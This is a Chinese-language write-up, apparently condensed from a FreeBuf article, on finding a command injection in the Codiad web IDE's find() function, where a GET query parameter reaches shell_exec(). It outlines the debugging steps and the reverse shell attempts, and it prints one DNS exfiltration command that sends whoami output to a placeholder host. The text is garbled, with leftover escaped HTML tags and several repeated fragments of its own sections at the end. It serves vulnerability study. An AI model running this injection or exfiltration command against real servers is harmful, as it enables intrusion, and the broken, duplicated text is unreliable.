Codiad在线IDE框架漏洞挖掘与分析<\/h1>

1. 简介<\/h2>
Codiad是一个开源基于Web的IDE应用程序，用于在线编写和编辑代码。该项目托管在GitHub上：https:\/\/github.com\/Codiad\/Codiad<\/p>

2. 环境搭建<\/h2>

2.1 基础环境<\/h3>

使用phpstudy搭建基础环境<\/li>
开启Xdebug进行调试<\/li>

参考配置文档：https:\/\/blog.csdn.net\/flyingdream123\/article\/details\/69358819<\/li> <\/ul>

2.2 Linux实验环境<\/h3>

参考FreeBuf文章搭建：http:\/\/www.freebuf.com\/articles\/web\/141788.html<\/li> <\/ul>

3. 漏洞挖掘过程<\/h2>

3.1 漏洞定位<\/h3>

通过CVE漏洞库查询Codiad历史漏洞<\/li>
发现该框架在shell_exec()<\/code>函数处理上多次出现问题<\/li>

锁定对该函数的调用作为切入点<\/li>
<\/ol>
3.2 关键函数分析<\/h3>

find()<\/code>函数调用shell_exec()<\/code><\/li>
$cmd<\/code>参数由$input<\/code>设置<\/li>
$input<\/code>由$this->query<\/code>设置<\/li>
$this->query<\/code>参数通过GET传参获取<\/li>
<\/ul>
3.3 调试过程<\/h3>

更改action<\/code>参数值为find<\/code>进行动态调试<\/li>
在进入action判断前，对path<\/code>参数进行了判定<\/li>
注意当前目录名称的影响<\/li>
观察shell_exec<\/code>执行拼接好的操作<\/li>
<\/ol>
3.4 漏洞原理<\/h3>

构造的query<\/code>参数被双引号包含<\/li>
即使调用escapeshellarg<\/code>函数处理参数，双引号包含仍可能导致命令执行<\/li>
上一个版本中此处已出现过命令执行漏洞<\/li>
<\/ul>
4. 漏洞验证<\/h2>
4.1 调试辅助<\/h3>

修改无查询结果时的返回信息为执行的$cmd<\/code>：
$this-><\/span>message<\/span> =<\/span> $cmd;
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4.2 初步验证<\/h3>

使用DNS外带查询判断命令执行：

在反引号中执行子命令应使用$()<\/code>语法<\/li>
示例：ping -c 1 $(whoami).xxx.xxx.io<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
4.3 反弹Shell尝试<\/h3>

服务器开启监听<\/li>
尝试多种反弹Shell的payload<\/li>
遇到限制时尝试其他方法：

使用wget写文件<\/li>
注意文件权限问题<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞利用<\/h2>
5.1 命令执行确认<\/h3>

虽然无法直接反弹Shell，但通过DNS外带确认命令执行存在<\/li>
示例payload成功获取信息<\/li>
<\/ul>
5.2 绕过限制<\/h3>

尝试网上各种反弹Shell的payload<\/li>
最终成功获取Shell<\/li>
过程中涉及多种权限问题处理<\/li>
<\/ul>
6. 总结<\/h2>
6.1 关键点<\/h3>

shell_exec()<\/code>函数的不当使用<\/li>
参数处理不彻底导致命令注入<\/li>
双引号包含构造参数的风险<\/li>
多种验证方法（DNS外带、反弹Shell）<\/li>
<\/ol>
6.2 学习收获<\/h3>

漏洞定位与分析技巧<\/li>
多种验证方法的实践<\/li>
Linux环境下的权限处理<\/li>
反弹Shell的各种尝试<\/li>
<\/ul>
注：本文基于FreeBuf原文内容整理，作者licong，转载请注明来自FreeBuf.COM<\/em><\/p>

Codiad在线IDE框架漏洞挖掘与分析<\/h1>

1. 简介<\/h2> Codiad是一个开源基于Web的IDE应用程序，用于在线编写和编辑代码。该项目托管在GitHub上：https:\/\/github.com\/Codiad\/Codiad<\/p>

2. 环境搭建<\/h2>

3. 漏洞挖掘过程<\/h2>

4. 漏洞验证<\/h2>

5. 漏洞利用<\/h2>

6. 总结<\/h2>

6.2 学习收获<\/h3> 漏洞定位与分析技巧<\/li> 多种验证方法的实践<\/li> Linux环境下的权限处理<\/li> 反弹Shell的各种尝试<\/li> <\/ul> 注：本文基于FreeBuf原文内容整理，作者licong，转载请注明来自FreeBuf.COM<\/em><\/p>

1. 简介<\/h2>
Codiad是一个开源基于Web的IDE应用程序，用于在线编写和编辑代码。该项目托管在GitHub上：https:\/\/github.com\/Codiad\/Codiad<\/p>

6.2 学习收获<\/h3>

漏洞定位与分析技巧<\/li>
多种验证方法的实践<\/li>
Linux环境下的权限处理<\/li>
反弹Shell的各种尝试<\/li> <\/ul>
注：本文基于FreeBuf原文内容整理，作者licong，转载请注明来自FreeBuf.COM<\/em><\/p>